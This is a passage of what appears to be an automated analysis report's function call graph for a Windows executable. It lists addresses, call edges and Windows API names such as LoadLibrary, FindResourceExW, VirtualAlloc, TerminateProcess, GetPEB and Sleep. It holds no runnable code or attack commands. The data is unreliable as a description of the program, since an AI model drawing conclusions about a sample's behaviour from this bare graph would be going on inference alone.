calls Mailbox 104813->105102 104816 c5cdd1 104819 bf8047 59 API calls 104816->104819 104817->104783 104818 bf79f2 59 API calls 104820 c5cdae 104818->104820 104821 c5cddf 104819->104821 104820->104816 104824 bf7bcc 59 API calls 104820->104824 104979 bf7b2e 104821->104979 104826 c5cdc3 104824->104826 104825 bf7b2e 59 API calls 104827 c5cdfb 104825->104827 104828 bf7bcc 59 API calls 104826->104828 104829 bf7b2e 59 API calls 104827->104829 104828->104816 104830 c5ce09 104829->104830 104831 bf9837 84 API calls 104830->104831 104832 c5ce15 104831->104832 104988 c54071 104832->104988 104834 c5ce26 104835 c53c37 3 API calls 104834->104835 104836 c5ce30 104835->104836 104837 bf9837 84 API calls 104836->104837 104840 c5ce61 104836->104840 104838 c5ce4e 104837->104838 105042 c59155 104838->105042 104841 bf4e4a 84 API calls 104840->104841 104841->104783 104843 bf4e54 104842->104843 104845 bf4e5b 104842->104845 104844 c153a6 __fcloseall 83 API calls 104843->104844 104844->104845 104846 bf4e7b FreeLibrary 104845->104846 104847 bf4e6a 104845->104847 104846->104847 104847->104690 105809 c6cadd 104848->105809 104850 c6df47 104850->104690 104851->104690 104853 c6bc96 104852->104853 104854 c6bcb0 104852->104854 105920 c59e4a 89 API calls 4 library calls 104853->105920 105921 c6a213 59 API calls Mailbox 104854->105921 104857 c6bcbb 104858 bf9ea0 340 API calls 104857->104858 104859 c6bd1c 104858->104859 104860 c6bdae 104859->104860 104864 c6bd5d 104859->104864 104868 c6bca8 Mailbox 104859->104868 104861 c6be04 104860->104861 104862 c6bdb4 104860->104862 104863 bf9837 84 API calls 104861->104863 104861->104868 105923 c5791a 59 API calls 104862->105923 104865 c6be16 104863->104865 105922 c572df 59 API calls Mailbox 104864->105922 104867 bf7e4f 59 API calls 104865->104867 104871 c6be3a CharUpperBuffW 104867->104871 104868->104685 104869 c6bdd7 105924 bf5d41 59 API calls Mailbox 104869->105924 104876 c6be54 104871->104876 104873 c6bd8d 104875 bff460 340 API calls 104873->104875 104874 c6bddf Mailbox 104880 bffce0 340 API calls 104874->104880 104875->104868 104877 c6bea7 104876->104877 104878 c6be5b 104876->104878 104879 bf9837 84 API calls 104877->104879 105925 c572df 59 API calls Mailbox 104878->105925 104881 c6beaf 104879->104881 104880->104868 105926 bf9e5d 60 API calls 104881->105926 104884 c6be89 104885 bff460 340 API calls 104884->104885 104885->104868 104886 c6beb9 104886->104868 104887 bf9837 84 API calls 104886->104887 104888 c6bed4 104887->104888 105927 bf5d41 59 API calls Mailbox 104888->105927 104890 c6bee4 104891 bffce0 340 API calls 104890->104891 104891->104868 104892->104686 104893->104749 104894->104755 104895->104755 104896->104755 104898 c53c3e 104897->104898 104899 c54475 FindFirstFileW 104897->104899 104898->104690 104899->104898 104900 c5448a FindClose 104899->104900 104900->104898 105103 bf4bb5 104901->105103 104906 c2d8e6 104908 bf4e4a 84 API calls 104906->104908 104907 bf4e08 LoadLibraryExW 105113 bf4b6a 104907->105113 104910 c2d8ed 104908->104910 104912 bf4b6a 3 API calls 104910->104912 104915 c2d8f5 104912->104915 104914 bf4e2f 104914->104915 104916 bf4e3b 104914->104916 105139 bf4f0b 104915->105139 104917 bf4e4a 84 API calls 104916->104917 104919 bf4e40 104917->104919 104919->104778 104919->104781 104922 c2d91c 105145 bf4ec7 104922->105145 104926 bf7667 59 API calls 104925->104926 104927 bf45b1 104926->104927 104928 bf7667 59 API calls 104927->104928 104929 bf45b9 104928->104929 104930 bf7667 59 API calls 104929->104930 104931 bf45c1 104930->104931 104932 bf7667 59 API calls 104931->104932 104933 bf45c9 104932->104933 104934 c2d4d2 104933->104934 104935 bf45fd 104933->104935 104936 bf8047 59 API calls 104934->104936 104937 bf784b 59 API calls 104935->104937 104938 c2d4db 104936->104938 104939 bf460b 104937->104939 104940 bf7d8c 59 API calls 104938->104940 104941 bf7d2c 59 API calls 104939->104941 104943 bf4640 104940->104943 104942 bf4615 104941->104942 104942->104943 104944 bf784b 59 API calls 104942->104944 104945 bf4680 104943->104945 104947 bf465f 104943->104947 104958 c2d4fb 104943->104958 104948 bf4636 104944->104948 105424 bf784b 104945->105424 104949 bf79f2 59 API calls 104947->104949 104952 bf7d2c 59 API calls 104948->104952 104953 bf4669 104949->104953 104950 bf4691 104954 bf46a3 104950->104954 104956 bf8047 59 API calls 104950->104956 104951 c2d5cb 104955 bf7bcc 59 API calls 104951->104955 104952->104943 104953->104945 104961 bf784b 59 API calls 104953->104961 104957 bf46b3 104954->104957 104962 bf8047 59 API calls 104954->104962 104965 c2d588 104955->104965 104956->104954 104960 bf46ba 104957->104960 104963 bf8047 59 API calls 104957->104963 104958->104951 104959 c2d5b4 104958->104959 104973 c2d532 104958->104973 104959->104951 104968 c2d59f 104959->104968 104964 bf8047 59 API calls 104960->104964 104972 bf46c1 Mailbox 104960->104972 104961->104945 104962->104957 104963->104960 104964->104972 104965->104945 104966 bf79f2 59 API calls 104965->104966 105437 bf7924 59 API calls 2 library calls 104965->105437 104966->104965 104967 c2d590 104969 bf7bcc 59 API calls 104967->104969 104970 bf7bcc 59 API calls 104968->104970 104969->104965 104970->104965 104972->104810 104973->104967 104974 c2d57b 104973->104974 104975 bf7bcc 59 API calls 104974->104975 104975->104965 104977 bf7e4f 59 API calls 104976->104977 104978 bf79fd 104977->104978 104978->104816 104978->104818 104980 c2ec6b 104979->104980 104981 bf7b40 104979->104981 105445 c47bdb 59 API calls _memmove 104980->105445 105439 bf7a51 104981->105439 104984 bf7b4c 104984->104825 104985 c2ec75 104986 bf8047 59 API calls 104985->104986 104987 c2ec7d Mailbox 104986->104987 104989 c5408d 104988->104989 104990 c540a0 104989->104990 104991 c54092 104989->104991 104993 bf7667 59 API calls 104990->104993 104992 bf8047 59 API calls 104991->104992 105041 c5409b Mailbox 104992->105041 104994 c540a8 104993->104994 104995 bf7667 59 API calls 104994->104995 104996 c540b0 104995->104996 104997 bf7667 59 API calls 104996->104997 104998 c540bb 104997->104998 104999 bf7667 59 API calls 104998->104999 105000 c540c3 104999->105000 105001 bf7667 59 API calls 105000->105001 105002 c540cb 105001->105002 105003 bf7667 59 API calls 105002->105003 105004 c540d3 105003->105004 105005 bf7667 59 API calls 105004->105005 105006 c540db 105005->105006 105041->104834 105043 c59162 __write_nolock 105042->105043 105044 c10db6 Mailbox 59 API calls 105043->105044 105045 c591bf 105044->105045 105046 bf522e 59 API calls 105045->105046 105047 c591c9 105046->105047 105448 c58f5f 105047->105448 105098 bf9b52 105097->105098 105099 bf9b4d 105097->105099 105098->104767 105099->105098 105808 c1358a 59 API calls 105099->105808 105101->104805 105102->104817 105150 bf4c03 105103->105150 105106 bf4bdc 105108 bf4bec FreeLibrary 105106->105108 105109 bf4bf5 105106->105109 105107 bf4c03 2 API calls 105107->105106 105108->105109 105110 c1525b 105109->105110 105154 c15270 105110->105154 105112 bf4dfc 105112->104906 105112->104907 105235 bf4c36 105113->105235 105116 bf4b8f 105118 bf4baa 105116->105118 105119 bf4ba1 FreeLibrary 105116->105119 105117 bf4c36 2 API calls 105117->105116 105120 bf4c70 105118->105120 105119->105118 105121 c10db6 Mailbox 59 API calls 105120->105121 105122 bf4c85 105121->105122 105123 bf522e 59 API calls 105122->105123 105124 bf4c91 _memmove 105123->105124 105125 bf4d89 105124->105125 105126 bf4dc1 105124->105126 105130 bf4ccc 105124->105130 105239 bf4e89 CreateStreamOnHGlobal 105125->105239 105250 c5991b 95 API calls 105126->105250 105127 bf4ec7 69 API calls 105136 bf4cd5 105127->105136 105130->105127 105131 bf4f0b 74 API calls 105131->105136 105133 bf4d69 105133->104914 105134 c2d8a7 105135 bf4ee5 85 API calls 105134->105135 105137 c2d8bb 105135->105137 105136->105131 105136->105133 105136->105134 105245 bf4ee5 105136->105245 105138 bf4f0b 74 API calls 105137->105138 105138->105133 105140 bf4f1d 105139->105140 105141 c2d9cd 105139->105141 105274 c155e2 105140->105274 105144 c59109 GetSystemTimeAsFileTime 105144->104922 105146 c2d990 105145->105146 105147 bf4ed6 105145->105147 105406 c15c60 105147->105406 105149 bf4ede 105151 bf4bd0 105150->105151 105152 bf4c0c LoadLibraryA 105150->105152 105151->105106 105151->105107 105152->105151 105153 bf4c1d GetProcAddress 105152->105153 105153->105151 105157 c1527c __freefls@4 105154->105157 105155 c1528f 105203 c18b28 58 API calls __getptd_noexit 105155->105203 105157->105155 105159 c152c0 105157->105159 105158 c15294 105204 c18db6 9 API calls strtoxl 105158->105204 105173 c204e8 105159->105173 105162 c152c5 105163 c152db 105162->105163 105164 c152ce 105162->105164 105165 c15305 105163->105165 105166 c152e5 105163->105166 105205 c18b28 58 API calls __getptd_noexit 105164->105205 105188 c20607 105165->105188 105206 c18b28 58 API calls __getptd_noexit 105166->105206 105170 c1529f @_EH4_CallFilterFunc@8 __freefls@4 105170->105112 105174 c204f4 __freefls@4 105173->105174 105175 c19c0b __lock 58 API calls 105174->105175 105185 c20502 105175->105185 105176 c20576 105208 c205fe 105176->105208 105177 c2057d 105213 c1881d 58 API calls 2 library calls 105177->105213 105180 c205f3 __freefls@4 105180->105162 105181 c20584 105181->105176 105214 c19e2b InitializeCriticalSectionAndSpinCount 105181->105214 105184 c19c93 __mtinitlocknum 58 API calls 105184->105185 105185->105176 105185->105177 105185->105184 105211 c16c50 59 API calls __lock 105185->105211 105212 c16cba LeaveCriticalSection LeaveCriticalSection _doexit 105185->105212 105186 c205aa EnterCriticalSection 105186->105176 105197 c20627 __wopenfile 105188->105197 105189 c20641 105219 c18b28 58 API calls __getptd_noexit 105189->105219 105191 c207fc 105191->105189 105195 c2085f 105191->105195 105192 c20646 105220 c18db6 9 API calls strtoxl 105192->105220 105194 c15310 105207 c15332 LeaveCriticalSection LeaveCriticalSection _fseek 105194->105207 105216 c285a1 105195->105216 105197->105189 105197->105191 105221 c137cb 60 API calls 3 library calls 105197->105221 105199 c207f5 105199->105191 105222 c137cb 60 API calls 3 library calls 105199->105222 105201 c20814 105201->105191 105223 c137cb 60 API calls 3 library calls 105201->105223 105203->105158 105204->105170 105205->105170 105206->105170 105207->105170 105215 c19d75 LeaveCriticalSection 105208->105215 105210 c20605 105210->105180 105211->105185 105212->105185 105213->105181 105214->105186 105215->105210 105224 c27d85 105216->105224 105218 c285ba 105218->105194 105219->105192 105220->105194 105221->105199 105222->105201 105223->105191 105227 c27d91 __freefls@4 105224->105227 105225 c27da7 105226 c18b28 __calloc_impl 58 API calls 105225->105226 105228 c27dac 105226->105228 105227->105225 105229 c27ddd 105227->105229 105231 c18db6 strtoxl 9 API calls 105228->105231 105230 c27e4e __wsopen_nolock 109 API calls 105229->105230 105232 c27df9 105230->105232 105234 c27db6 __freefls@4 105231->105234 105233 c27e22 __wsopen_helper LeaveCriticalSection 105232->105233 105233->105234 105234->105218 105236 bf4b83 105235->105236 105237 bf4c3f LoadLibraryA 105235->105237 105236->105116 105236->105117 105237->105236 105238 bf4c50 GetProcAddress 105237->105238 105238->105236 105240 bf4ea3 FindResourceExW 105239->105240 105244 bf4ec0 105239->105244 105241 c2d933 LoadResource 105240->105241 105240->105244 105242 c2d948 SizeofResource 105241->105242 105241->105244 105243 c2d95c LockResource 105242->105243 105242->105244 105243->105244 105244->105130 105246 c2d9ab 105245->105246 105247 bf4ef4 105245->105247 105251 c1584d 105247->105251 105249 bf4f02 105249->105136 105250->105130 105252 c15859 __freefls@4 105251->105252 105253 c1586b 105252->105253 105255 c15891 105252->105255 105264 c18b28 58 API calls __getptd_noexit 105253->105264 105266 c16c11 105255->105266 105257 c15870 105265 c18db6 9 API calls strtoxl 105257->105265 105261 c158a6 105273 c158c8 LeaveCriticalSection LeaveCriticalSection _fseek 105261->105273 105263 c1587b __freefls@4 105263->105249 105264->105257 105265->105263 105267 c16c21 105266->105267 105268 c16c43 EnterCriticalSection 105266->105268 105267->105268 105269 c16c29 105267->105269 105270 c15897 105268->105270 105271 c19c0b __lock 58 API calls 105269->105271 105272 c157be 83 API calls 5 library calls 105270->105272 105271->105270 105272->105261 105273->105263 105277 c155fd 105274->105277 105276 bf4f2e 105276->105144 105278 c15609 __freefls@4 105277->105278 105279 c1564c 105278->105279 105280 c1561f _memset 105278->105280 105281 c15644 __freefls@4 105278->105281 105282 c16c11 __lock_file 59 API calls 105279->105282 105304 c18b28 58 API calls __getptd_noexit 105280->105304 105281->105276 105283 c15652 105282->105283 105290 c1541d 105283->105290 105286 c15639 105305 c18db6 9 API calls strtoxl 105286->105305 105294 c15438 _memset 105290->105294 105296 c15453 105290->105296 105291 c15443 105402 c18b28 58 API calls __getptd_noexit 105291->105402 105293 c15448 105403 c18db6 9 API calls strtoxl 105293->105403 105294->105291 105294->105296 105299 c15493 105294->105299 105306 c15686 LeaveCriticalSection LeaveCriticalSection _fseek 105296->105306 105298 c155a4 _memset 105405 c18b28 58 API calls __getptd_noexit 105298->105405 105299->105296 105299->105298 105307 c146e6 105299->105307 105314 c20e5b 105299->105314 105382 c20ba7 105299->105382 105404 c20cc8 58 API calls 4 library calls 105299->105404 105304->105286 105305->105281 105306->105281 105308 c146f0 105307->105308 105309 c14705 105307->105309 105310 c18b28 __calloc_impl 58 API calls 105308->105310 105309->105299 105311 c146f5 105310->105311 105312 c18db6 strtoxl 9 API calls 105311->105312 105313 c14700 105312->105313 105313->105299 105315 c20e93 105314->105315 105316 c20e7c 105314->105316 105317 c215cb 105315->105317 105321 c20ecd 105315->105321 105318 c18af4 __free_osfhnd 58 API calls 105316->105318 105319 c18af4 __free_osfhnd 58 API calls 105317->105319 105320 c20e81 105318->105320 105322 c215d0 105319->105322 105323 c18b28 __calloc_impl 58 API calls 105320->105323 105324 c20ed5 105321->105324 105331 c20eec 105321->105331 105325 c18b28 __calloc_impl 58 API calls 105322->105325 105362 c20e88 105323->105362 105326 c18af4 __free_osfhnd 58 API calls 105324->105326 105327 c20ee1 105325->105327 105328 c20eda 105326->105328 105329 c18db6 strtoxl 9 API calls 105327->105329 105333 c18b28 __calloc_impl 58 API calls 105328->105333 105329->105362 105330 c20f01 105334 c18af4 __free_osfhnd 58 API calls 105330->105334 105331->105330 105332 c20f1b 105331->105332 105335 c20f39 105331->105335 105331->105362 105332->105330 105337 c20f26 105332->105337 105333->105327 105334->105328 105336 c1881d __malloc_crt 58 API calls 105335->105336 105338 c20f49 105336->105338 105339 c25c6b __write_nolock 58 API calls 105337->105339 105340 c20f51 105338->105340 105341 c20f6c 105338->105341 105342 c2103a 105339->105342 105345 c18b28 __calloc_impl 58 API calls 105340->105345 105344 c218c1 __lseeki64_nolock 60 API calls 105341->105344 105343 c210b3 ReadFile 105342->105343 105346 c21050 GetConsoleMode 105342->105346 105347 c21593 GetLastError 105343->105347 105348 c210d5 105343->105348 105344->105337 105349 c20f56 105345->105349 105350 c210b0 105346->105350 105351 c21064 105346->105351 105352 c215a0 105347->105352 105353 c21093 105347->105353 105348->105347 105357 c210a5 105348->105357 105354 c18af4 __free_osfhnd 58 API calls 105349->105354 105350->105343 105351->105350 105355 c2106a ReadConsoleW 105351->105355 105356 c18b28 __calloc_impl 58 API calls 105352->105356 105360 c18b07 __dosmaperr 58 API calls 105353->105360 105364 c21099 105353->105364 105354->105362 105355->105357 105359 c2108d GetLastError 105355->105359 105358 c215a5 105356->105358 105357->105364 105365 c2110a 105357->105365 105370 c21377 105357->105370 105361 c18af4 __free_osfhnd 58 API calls 105358->105361 105359->105353 105360->105364 105361->105364 105362->105299 105363 c12d55 _free 58 API calls 105363->105362 105364->105362 105364->105363 105367 c21176 ReadFile 105365->105367 105376 c211f7 105365->105376 105372 c21197 GetLastError 105367->105372 105373 c211a1 105367->105373 105368 c212b4 105377 c218c1 __lseeki64_nolock 60 API calls 105368->105377 105379 c21264 MultiByteToWideChar 105368->105379 105369 c212a4 105374 c18b28 __calloc_impl 58 API calls 105369->105374 105370->105364 105371 c2147d ReadFile 105370->105371 105375 c214a0 GetLastError 105371->105375 105381 c214ae 105371->105381 105372->105373 105373->105365 105378 c218c1 __lseeki64_nolock 60 API calls 105373->105378 105374->105364 105375->105381 105376->105364 105376->105368 105376->105369 105376->105379 105377->105379 105378->105373 105379->105359 105379->105364 105380 c218c1 __lseeki64_nolock 60 API calls 105380->105381 105381->105370 105381->105380 105383 c20bb2 105382->105383 105384 c20bc7 105382->105384 105385 c18b28 __calloc_impl 58 API calls 105383->105385 105388 c20bfc 105384->105388 105389 c25fe4 __getbuf 58 API calls 105384->105389 105394 c20bc2 105384->105394 105386 c20bb7 105385->105386 105387 c18db6 strtoxl 9 API calls 105386->105387 105387->105394 105390 c146e6 __fputwc_nolock 58 API calls 105388->105390 105389->105388 105391 c20c10 105390->105391 105392 c20d47 __read 72 API calls 105391->105392 105393 c20c17 105392->105393 105393->105394 105395 c146e6 __fputwc_nolock 58 API calls 105393->105395 105394->105299 105396 c20c3a 105395->105396 105396->105394 105397 c146e6 __fputwc_nolock 58 API calls 105396->105397 105398 c20c46 105397->105398 105398->105394 105399 c146e6 __fputwc_nolock 58 API calls 105398->105399 105400 c20c53 105399->105400 105401 c146e6 __fputwc_nolock 58 API calls 105400->105401 105401->105394 105402->105293 105403->105296 105404->105299 105405->105293 105407 c15c6c __freefls@4 105406->105407 105408 c15c93 105407->105408 105409 c15c7e 105407->105409 105411 c16c11 __lock_file 59 API calls 105408->105411 105420 c18b28 58 API calls __getptd_noexit 105409->105420 105413 c15c99 105411->105413 105412 c15c83 105421 c18db6 9 API calls strtoxl 105412->105421 105422 c158d0 67 API calls 7 library calls 105413->105422 105416 c15ca4 105423 c15cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105416->105423 105418 c15cb6 105419 c15c8e __freefls@4 105418->105419 105419->105149 105420->105412 105421->105419 105422->105416 105423->105418 105425 bf785a 105424->105425 105426 bf78b7 105424->105426 105425->105426 105427 bf7865 105425->105427 105428 bf7d2c 59 API calls 105426->105428 105430 c2eb09 105427->105430 105431 bf7880 105427->105431 105429 bf7888 _memmove 105428->105429 105429->104950 105433 bf8029 59 API calls 105430->105433 105438 bf7f27 59 API calls Mailbox 105431->105438 105434 c2eb13 105433->105434 105435 c10db6 Mailbox 59 API calls 105434->105435 105436 c2eb33 105435->105436 105437->104965 105438->105429 105440 bf7a5f 105439->105440 105444 bf7a85 _memmove 105439->105444 105441 c10db6 Mailbox 59 API calls 105440->105441 105440->105444 105442 bf7ad4 105441->105442 105443 c10db6 Mailbox 59 API calls 105442->105443 105443->105444 105444->104984 105445->104985 105808->105098 105810 bf9837 84 API calls 105809->105810 105811 c6cb1a 105810->105811 105829 c6cb61 Mailbox 105811->105829 105847 c6d7a5 105811->105847 105813 c6cdb9 105814 c6cf2e 105813->105814 105819 c6cdc7 105813->105819 105897 c6d8c8 92 API calls Mailbox 105814->105897 105817 c6cf3d 105817->105819 105820 c6cf49 105817->105820 105818 bf9837 84 API calls 105826 c6cbb2 Mailbox 105818->105826 105860 c6c96e 105819->105860 105820->105829 105825 c6ce00 105875 c10c08 105825->105875 105826->105813 105826->105818 105826->105829 105879 c6fbce 59 API calls 2 library calls 105826->105879 105880 c6cfdf 61 API calls 2 library calls 105826->105880 105829->104850 105830 c6ce33 105882 bf92ce 105830->105882 105831 c6ce1a 105881 c59e4a 89 API calls 4 library calls 105831->105881 105834 c6ce25 GetCurrentProcess TerminateProcess 105834->105830 105838 c6cfa4 105838->105829 105843 c6cfb8 FreeLibrary 105838->105843 105840 c6ce6b 105894 c6d649 107 API calls _free 105840->105894 105843->105829 105846 c6ce7c 105846->105838 105895 bf8d40 59 API calls Mailbox 105846->105895 105896 bf9d3c 60 API calls Mailbox 105846->105896 105898 c6d649 107 API calls _free 105846->105898 105848 bf7e4f 59 API calls 105847->105848 105849 c6d7c0 CharLowerBuffW 105848->105849 105899 c4f167 105849->105899 105853 bf7667 59 API calls 105854 c6d7f9 105853->105854 105855 bf784b 59 API calls 105854->105855 105856 c6d810 105855->105856 105857 bf7d2c 59 API calls 105856->105857 105858 c6d81c Mailbox 105857->105858 105859 c6d858 Mailbox 105858->105859 105906 c6cfdf 61 API calls 2 library calls 105858->105906 105859->105826 105861 c6c989 105860->105861 105862 c6c9de 105860->105862 105863 c10db6 Mailbox 59 API calls 105861->105863 105866 c6da50 105862->105866 105865 c6c9ab 105863->105865 105864 c10db6 Mailbox 59 API calls 105864->105865 105865->105862 105865->105864 105867 c6dc79 Mailbox 105866->105867 105874 c6da73 _strcat _wcscpy __NMSG_WRITE 105866->105874 105867->105825 105868 bf9b3c 59 API calls 105868->105874 105869 bf9b98 59 API calls 105869->105874 105870 bf9be6 59 API calls 105870->105874 105871 bf9837 84 API calls 105871->105874 105872 c1571c 58 API calls _W_store_winword 105872->105874 105874->105867 105874->105868 105874->105869 105874->105870 105874->105871 105874->105872 105909 c55887 61 API calls 2 library calls 105874->105909 105877 c10c1d 105875->105877 105876 c10cb5 VirtualAlloc 105878 c10c83 105876->105878 105877->105876 105877->105878 105878->105830 105878->105831 105879->105826 105880->105826 105881->105834 105883 bf92d6 105882->105883 105884 c10db6 Mailbox 59 API calls 105883->105884 105885 bf92e4 105884->105885 105886 bf92f0 105885->105886 105910 bf91fc 59 API calls Mailbox 105885->105910 105888 bf9050 105886->105888 105911 bf9160 105888->105911 105890 bf905f 105891 c10db6 Mailbox 59 API calls 105890->105891 105892 bf90fb 105890->105892 105891->105892 105892->105846 105893 bf8d40 59 API calls Mailbox 105892->105893 105893->105840 105894->105846 105895->105846 105896->105846 105897->105817 105898->105846 105900 c4f192 __NMSG_WRITE 105899->105900 105901 c4f1d1 105900->105901 105904 c4f1c7 105900->105904 105905 c4f278 105900->105905 105901->105853 105901->105858 105904->105901 105907 bf78c4 61 API calls 105904->105907 105905->105901 105908 bf78c4 61 API calls 105905->105908 105906->105859 105907->105904 105908->105905 105909->105874 105910->105886 105912 bf9169 Mailbox 105911->105912 105913 c2f19f 105912->105913 105918 bf9173 105912->105918 105914 c10db6 Mailbox 59 API calls 105913->105914 105917 c2f1ab 105914->105917 105915 bf917a 105915->105890 105917->105917 105918->105915 105919 bf9c90 59 API calls Mailbox 105918->105919 105919->105918 105920->104868 105921->104857 105922->104873 105923->104869 105924->104874 105925->104884 105926->104886 105927->104890 105928->104711 105929->104707 105930->104600 105931->104600 105932->104596 105933->104603 105934->104606 105935->104603 105936->104626 105937->104631 105938 c31de4 GetTempPathW 105939 c31e01 105938->105939 105939->105939 105940 22823e0 105954 2280000 105940->105954 105942 22824b1 105957 22822d0 105942->105957 105960 2283500 GetPEB 105954->105960 105956 228068b 105956->105942 105958 22822d9 Sleep 105957->105958 105959 22822e7 105958->105959 105961 228352a 105960->105961 105961->105956 105962 bf1016 105967 bf4974 105962->105967 105965 c12d40 __cinit 67 API calls 105966 bf1025 105965->105966 105968 c10db6 Mailbox 59 API calls 105967->105968 105969 bf497c 105968->105969 105970 bf101b 105969->105970 105974 bf4936 105969->105974 105970->105965 105975 bf493f 105974->105975 105976 bf4951 105974->105976 105977 c12d40 __cinit 67 API calls 105975->105977 105978 bf49a0 105976->105978 105977->105976 105979 bf7667 59 API calls 105978->105979 105980 bf49b8 GetVersionExW 105979->105980 105981 bf7bcc 59 API calls 105980->105981 105982 bf49fb 105981->105982 105983 bf7d2c 59 API calls 105982->105983 105986 bf4a28 105982->105986 105984 bf4a1c 105983->105984 105985 bf7726 59 API calls 105984->105985 105985->105986 105987 bf4a93 GetCurrentProcess IsWow64Process 105986->105987 105988 c2d864 105986->105988 105989 bf4aac 105987->105989 105990 bf4b2b GetSystemInfo 105989->105990 105991 bf4ac2 105989->105991 105992 bf4af8 105990->105992 106002 bf4b37 105991->106002 105992->105970 105995 bf4b1f GetSystemInfo 105998 bf4ae9 105995->105998 105996 bf4ad4 105997 bf4b37 2 API calls 105996->105997 105999 bf4adc GetNativeSystemInfo 105997->105999 105998->105992 106000 bf4aef FreeLibrary 105998->106000 105999->105998 106000->105992 106003 bf4ad0 106002->106003 106004 bf4b40 LoadLibraryA 106002->106004 106003->105995 106003->105996 106004->106003 106005 bf4b51 GetProcAddress 106004->106005 106005->106003 106006 bf1055 106011 bf2649 106006->106011 106009 c12d40 __cinit 67 API calls 106010 bf1064 106009->106010 106012 bf7667 59 API calls 106011->106012 106013 bf26b7 106012->106013 106018 bf3582 106013->106018 106015 bf2754 106017 bf105a 106015->106017 106021 bf3416 59 API calls 2 library calls 106015->106021 106017->106009 106022 bf35b0 106018->106022 106021->106015 106023 bf35a1 106022->106023 106024 bf35bd 106022->106024 106023->106015 106024->106023 106025 bf35c4 RegOpenKeyExW 106024->106025 106025->106023 106026 bf35de RegQueryValueExW 106025->106026 106027 bf35ff 106026->106027 106028 bf3614 RegCloseKey 106026->106028 106027->106028 106028->106023 106029 bf3633 106030 bf366a 106029->106030 106031 bf3688 106030->106031 106032 bf36e7 106030->106032 106070 bf36e5 106030->106070 106036 bf374b PostQuitMessage 106031->106036 106037 bf3695 106031->106037 106034 bf36ed 106032->106034 106035 c2d0cc 106032->106035 106033 bf36ca DefWindowProcW 106043 bf36d8 106033->106043 106038 bf3715 SetTimer RegisterWindowMessageW 106034->106038 106039 bf36f2 106034->106039 106078 c01070 10 API calls Mailbox 106035->106078 106036->106043 106041 c2d154 106037->106041 106042 bf36a0 106037->106042 106038->106043 106047 bf373e CreatePopupMenu 106038->106047 106044 bf36f9 KillTimer 106039->106044 106045 c2d06f 106039->106045 106094 c52527 71 API calls _memset 106041->106094 106048 bf36a8 106042->106048 106049 bf3755 106042->106049 106074 bf443a Shell_NotifyIconW _memset 106044->106074 106057 c2d074 106045->106057 106058 c2d0a8 MoveWindow 106045->106058 106046 c2d0f3 106079 c01093 341 API calls Mailbox 106046->106079 106047->106043 106053 c2d139 106048->106053 106054 bf36b3 106048->106054 106076 bf44a0 64 API calls _memset 106049->106076 106053->106033 106093 c47c36 59 API calls Mailbox 106053->106093 106062 bf36be 106054->106062 106063 c2d124 106054->106063 106055 c2d166 106055->106033 106055->106043 106059 c2d097 SetFocus 106057->106059 106060 c2d078 106057->106060 106058->106043 106059->106043 106060->106062 106065 c2d081 106060->106065 106061 bf370c 106075 bf3114 DeleteObject DestroyWindow Mailbox 106061->106075 106062->106033 106080 bf443a Shell_NotifyIconW _memset 106062->106080 106092 c52d36 81 API calls _memset 106063->106092 106064 bf3764 106064->106043 106077 c01070 10 API calls Mailbox 106065->106077 106070->106033 106072 c2d118 106081 bf434a 106072->106081 106074->106061 106075->106043 106076->106064 106077->106043 106078->106046 106079->106062 106080->106072 106082 bf4375 _memset 106081->106082 106095 bf4182 106082->106095 106085 bf43fa 106087 bf4414 Shell_NotifyIconW 106085->106087 106088 bf4430 Shell_NotifyIconW 106085->106088 106089 bf4422 106087->106089 106088->106089 106099 bf407c 106089->106099 106091 bf4429 106091->106070 106092->106064 106093->106070 106094->106055 106096 c2d423 106095->106096 106097 bf4196 106095->106097 106096->106097 106098 c2d42c DestroyIcon 106096->106098 106097->106085 106121 c52f94 62 API calls _W_store_winword 106097->106121 106098->106097 106100 bf4098 106099->106100 106120 bf416f Mailbox 106099->106120 106122 bf7a16 106100->106122 106103 c2d3c8 LoadStringW 106106 c2d3e2 106103->106106 106104 bf40b3 106105 bf7bcc 59 API calls 106104->106105 106107 bf40c8 106105->106107 106108 bf7b2e 59 API calls 106106->106108 106107->106106 106109 bf40d9 106107->106109 106114 c2d3ec 106108->106114 106110 bf4174 106109->106110 106111 bf40e3 106109->106111 106113 bf8047 59 API calls 106110->106113 106112 bf7b2e 59 API calls 106111->106112 106116 bf40ed _memset _wcscpy 106112->106116 106113->106116 106115 bf7cab 59 API calls 106114->106115 106114->106116 106117 c2d40e 106115->106117 106118 bf4155 Shell_NotifyIconW 106116->106118 106119 bf7cab 59 API calls 106117->106119 106118->106120 106119->106116 106120->106091 106121->106085 106123 c10db6 Mailbox 59 API calls 106122->106123 106124 bf7a3b 106123->106124 106125 bf8029 59 API calls 106124->106125 106126 bf40a6 106125->106126 106126->106103 106126->106104 106127 bfb40e 106128 c0f944 60 API calls 106127->106128 106129 bfb424 106128->106129 106135 bfc5a7 106129->106135 106131 bfb44c 106132 bfa388 106131->106132 106147 c59e4a 89 API calls 4 library calls 106131->106147 106134 c308e9 106136 bf7a16 59 API calls 106135->106136 106137 bfc5cc _wcscmp 106136->106137 106138 bf7de1 59 API calls 106137->106138 106140 bfc600 Mailbox 106137->106140 106139 c31691 106138->106139 106141 bf7b2e 59 API calls 106139->106141 106140->106131 106142 c3169c 106141->106142 106148 bf843a 68 API calls 106142->106148 106144 c316ad 106146 c316b1 Mailbox 106144->106146 106149 bf9d3c 60 API calls Mailbox 106144->106149 106146->106131 106147->106134 106148->106144 106149->106146 106150 bfe5ab 106153 bfd100 106150->106153 106152 bfe5b9 106154 bfd11d 106153->106154 106171 bfd37d 106153->106171 106155 c32691 106154->106155 106156 c326e0 106154->106156 106172 bfd144 106154->106172 106159 c32694 106155->106159 106166 c326af 106155->106166 106197 c6a3e6 341 API calls __cinit 106156->106197 106160 c326a0 106159->106160 106159->106172 106195 c6a9fa 341 API calls 106160->106195 106162 c12d40 __cinit 67 API calls 106162->106172 106164 c328b5 106164->106164 106165 bfd54b 106165->106152 106166->106171 106196 c6aea2 341 API calls 3 library calls 106166->106196 106167 bfd434 106189 bf8a52 68 API calls 106167->106189 106171->106165 106202 c59e4a 89 API calls 4 library calls 106171->106202 106172->106162 106172->106165 106172->106167 106172->106171 106174 c327fc 106172->106174 106178 bf84c0 69 API calls 106172->106178 106184 bf9ea0 341 API calls 106172->106184 106185 bf8047 59 API calls 106172->106185 106187 bf8740 68 API calls __cinit 106172->106187 106188 bf8542 68 API calls 106172->106188 106190 bf843a 68 API calls 106172->106190 106191 bfcf7c 341 API calls 106172->106191 106192 bf9dda 59 API calls Mailbox 106172->106192 106193 bfcf00 